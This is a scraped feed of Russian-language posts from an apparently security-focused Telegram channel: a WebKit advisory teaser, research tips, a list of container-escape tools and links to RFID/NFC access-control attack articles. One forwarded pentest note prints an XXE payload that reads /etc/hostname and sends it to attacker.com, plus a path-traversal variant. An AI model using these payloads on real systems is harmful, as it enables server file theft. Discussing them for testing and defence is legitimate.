This media is not supported in your browser
VIEW IN TELEGRAM
Apple WebKit Arbitrary Code Execution
Затронутые версии: WebKitGTK и WPE WebKit до версии 2.42.1.
Импакт: Обработка веб-контента может привести к выполнению произвольного кода.
Переходите по ссылке, только если вы уверены, что ваше яблочное устройство обновлено до последней версии или у вас Android.
Please open Telegram to view this post
VIEW IN TELEGRAM
😎9⚡2👍2💔2
This media is not supported in your browser
VIEW IN TELEGRAM
Как провести свое первое security-исследование. Колонка Дениса Макрушина
Начало учебного года — это еще и начало сезона подготовки дипломных работ. А это значит, что у меня наступает сезон формулирования тем для студентов факультетов и кафедр информационной безопасности в ведущих вузах. Я собрал свои рекомендации и лайфхаки для подготовки твоего первого ИБ‑исследования.
От себя добавлю, что материал подойдёт всем, кто планирует или уже делает доклад/исследование на какую-то тему, не обязательно ИБ. В статье говориться про сам подход к ресерчам.
Отмечу сайт cfptime.org , где вы сможете отслеживать мировые конференции по ИБ, на которые вы сможете подавать на CFP (Call Of Papers).
А также ict2go для поиска мероприятий по различным направлениям и формату в России.
➡️ Статья на Xakep
🌚 @poxek
Начало учебного года — это еще и начало сезона подготовки дипломных работ. А это значит, что у меня наступает сезон формулирования тем для студентов факультетов и кафедр информационной безопасности в ведущих вузах. Я собрал свои рекомендации и лайфхаки для подготовки твоего первого ИБ‑исследования.
От себя добавлю, что материал подойдёт всем, кто планирует или уже делает доклад/исследование на какую-то тему, не обязательно ИБ. В статье говориться про сам подход к ресерчам.
Отмечу сайт cfptime.org , где вы сможете отслеживать мировые конференции по ИБ, на которые вы сможете подавать на CFP (Call Of Papers).
А также ict2go для поиска мероприятий по различным направлениям и формату в России.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9
Positive Technologies. Разговор об актуальных трендах кибербезопасности
Локация: Музей криптографии
Локация: Музей криптографии
❤21⚡3
Forwarded from #Arm1tage
Обход Out-of-Band XML с получением содержимого файла через Path Traversal
Новости с полей, потели сегодня с челами над одним проектом и пытались раскрутить Error-Based ХХЕ. Проблема:
В итоге вот этот уважаемый господин подсказал необычное решение использовать Path Traversal прямо в DTD коде:
#xxe
Новости с полей, потели сегодня с челами над одним проектом и пытались раскрутить Error-Based ХХЕ. Проблема:
<!ENTITY % file SYSTEM "file:///etc/hostname">Этот классический DTD код для отправки файла на attacker.com не отрабатывал по неизвестным причинам: реквеста на наш сервер небыло а в респонсе при любой модификации ХМЛ сервер выдавал одну и ту же ошибку.
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfil;
В итоге вот этот уважаемый господин подсказал необычное решение использовать Path Traversal прямо в DTD коде:
<!ENTITY % file SYSTEM "file://../../../../../../etc/hostname">И удивительно, но это сработало. В последствии стало ясно, что сервер не отправлял никаких реквестов на attacker.com, потому что не мог по каким-то причинам найти файл, если задать полный путь.
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfil;
#xxe
🔥9👍4
Forwarded from Blue (h/c)at Café (Женя Белкин '";DROP DATABASE db_name();--)
Инструменты для поиска проблем в докере 💻
На каждом собеседовании заходит речь про докеры. "Что это?", "Как их использовать?", "Зачем нужны?" и самое главное, — "Как из них выходить?". Есть множество способов, которые можно найти на hacktricks, но сегодня разговор зайдет про инструментарий.
Мне, как нынешнему DevSecOps-у удалось потыкать несколько видов развёртывания инструментов в нем. Я сейчас строю процесс на Gitlab Ci\Cd и у его раннера есть возможность работать как в обычном докере, так и в его "улучшенной" версии.
💻 Docker
Возможен запуск с привилегиями (обычно от этого и отталкиваемся)
💻 Docker in docker
Всегда запущен с привилегиями
💻 Kaniko (dind от Google), buildah, umoci, img
Всегда запущен с привилегиями
🔵 Инструменты Automatic Enumeration/Escape
🌐 deepce — Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE);
🌐 CDK — инструментарий для проникновения в контейнеры с открытым исходным кодом, предназначенный для обеспечения стабильной эксплуатации в различных тонких контейнерах без зависимости от ОС;
🌐 grype — cканер уязвимостей для образов контейнеров и файловых систем;
🌐 LinPEAS — да, у него есть замечательная функция работы с контейнерами;
🌐 dive — инструмент для изучения образа docker, содержимого слоев и поиска способов уменьшения размера образа Docker/OCI.
#opensource #devsecops #blueteam #redteam
На каждом собеседовании заходит речь про докеры. "Что это?", "Как их использовать?", "Зачем нужны?" и самое главное, — "Как из них выходить?". Есть множество способов, которые можно найти на hacktricks, но сегодня разговор зайдет про инструментарий.
Мне, как нынешнему DevSecOps-у удалось потыкать несколько видов развёртывания инструментов в нем. Я сейчас строю процесс на Gitlab Ci\Cd и у его раннера есть возможность работать как в обычном докере, так и в его "улучшенной" версии.
Возможен запуск с привилегиями (обычно от этого и отталкиваемся)
Всегда запущен с привилегиями
Всегда запущен с привилегиями
#opensource #devsecops #blueteam #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10
This media is not supported in your browser
VIEW IN TELEGRAM
Сегодня хочу с вами поделиться двуми прекрасными статьями про атаки на СКУД с помощью NFC и RFID.
#nfc #rfid #xakep #физика
NFC глазами хакера. Разбираем атаки на СКУД системы Mifare
Когда простых идентификаторов для контроля доступа становится недостаточно, многие думают о внедрении более совершенного решения — Mifare. Но так ли эти устройства безопасны, как обещает производитель? Попробуем разобраться!
СКУД глазами хакера. Атакуем системы контроля доступа на основе RFID
Взлом электронных турникетов на входе в здание — заветный хакерский флекс, который так любят показывать в кино. В этой статье я расскажу о системах контроля и управления доступом (СКУД) на основе RFID, и мы вместе разберемся, насколько просто подделать самый распространенный идентификатор EM4100.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10🔥2❤1⚡1